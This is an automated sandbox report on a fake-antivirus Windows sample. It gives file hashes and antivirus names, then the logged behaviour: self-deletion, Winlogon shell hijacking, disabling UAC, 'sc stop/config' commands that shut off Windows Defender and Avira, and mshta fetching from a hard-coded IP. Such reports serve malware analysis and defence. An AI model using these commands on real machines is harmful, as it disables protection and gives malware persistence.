Totalhash sandbox scan report for the file with SHA1 411220efaeaee91c7ef4234ad910b862be8e6a5e



Analysis Date: 2013-12-08 21:37:26
MD5: 612632cc627f448c3411181d18cd57c2
SHA1: 411220efaeaee91c7ef4234ad910b862be8e6a5e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section md5: 173f4245a3f7f3e68d2f8f5f562988c5 sha1: 038a2278d7d12cc3a5f4925ff2635612bc82c71c size: 232960
Section md5: 850834f045fa829affe01bf19879b31f sha1: fd040c9dc078d430d6f65d378b3f475ab8851072 size: 60928
Section md5: 86d8a2499167ccd5f51b8f6dea2e04fd sha1: 07097eb7abd98a8322074b16403712d0c77ee0ac size: 6656
Section .rsrc md5: 75922c292c8a69d715ffc261ec1f0cb7 sha1: dc11da3da2a379577d98060a9e0616e0cd4c0e20 size: 347648
Section data md5: af5d63493b1703ce1f370f49affd3d8b sha1: 992d50e67a4ca959a460278dda033d3bd372944f size: 308224
Section .adata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Timestamp: 2013-11-24 18:38:01
Packer: ASProtect v1.2
PEhash: 27ef684731b3e2313365e26e827ddfce85e643ad
AV msse: Rogue:Win32/FakePAV
AV avira: TR/Fraud.Gen8
AV avg: Adware Generic5.AKJE

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\guard-ospp.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c del C:\411220~1.EXE >> NUL
Creates Process: C:\Documents and Settings\Administrator\Application Data\guard-ospp.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c del C:\411220~1.EXE >> NUL

Creates File: NUL
Deletes File: C:\malware.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\guard-ospp.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings\UID ➝ cxrkhfihik\\x00
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments\SaveZoneInformation ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ C:\Documents and Settings\Administrator\Application Data\guard-ospp.exe\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes ➝ .zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;\\x00
Creates File: PIPE\lsarpc
Creates Process: sc config AntiVirSchedulerService start= disabled
Creates Process: sc config AntiVirService start= disabled
Creates Process: mshta.exe "http://109.236.86.173/?0=1&1=1&2=2&3=i&4=2600&5=0&6=1111&7=cxrkhfihik"
Creates Process: sc stop WinDefend
Creates Process: sc stop AntiVirService
Creates Process: sc config WinDefend start= disabled
Creates Process: sc stop msmpsvc
Creates Process: sc config msmpsvc start= disabled
Creates Process: sc config GuardX start= disabled
Creates Process: sc stop GuardX
Creates Mutex: WinProt
Winsock URL: http://checkip.dyndns.org/

Process
↳ sc stop WinDefend

Process
↳ sc config WinDefend start= disabled

Process
↳ sc stop msmpsvc

Process
↳ sc config msmpsvc start= disabled

Process
↳ sc stop AntiVirService

Process
↳ sc config AntiVirService start= disabled

Process
↳ sc config AntiVirSchedulerService start= disabled

Process
↳ sc stop GuardX

Process
↳ sc config GuardX start= disabled

Process
↳ mshta.exe "http://109.236.86.173/?0=1&1=1&2=2&3=i&4=2600&5=0&6=1111&7=cxrkhfihik"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\109.236.86[1].htm
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Winsock DNS: 109.236.86.173

Network Details:

DNS: checkip.dyndns.com
Type: A
216.146.43.70
DNS: checkip.dyndns.com
Type: A
91.198.22.70
DNS: checkip.dyndns.com
Type: A
216.146.38.70
DNS: checkip.dyndns.com
Type: A
216.146.39.70
DNS: checkip.dyndns.org
Type: A
HTTP GET: http://checkip.dyndns.org/
User-Agent: Mozilla/4.0
HTTP GET: http://109.236.86.173/?0=1&1=1&2=2&3=i&4=2600&5=0&6=1111&7=cxrkhfihik
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 216.146.43.70:80
Flows TCP: 192.168.1.1:1033 ➝ 109.236.86.173:80

Raw Pcap


Strings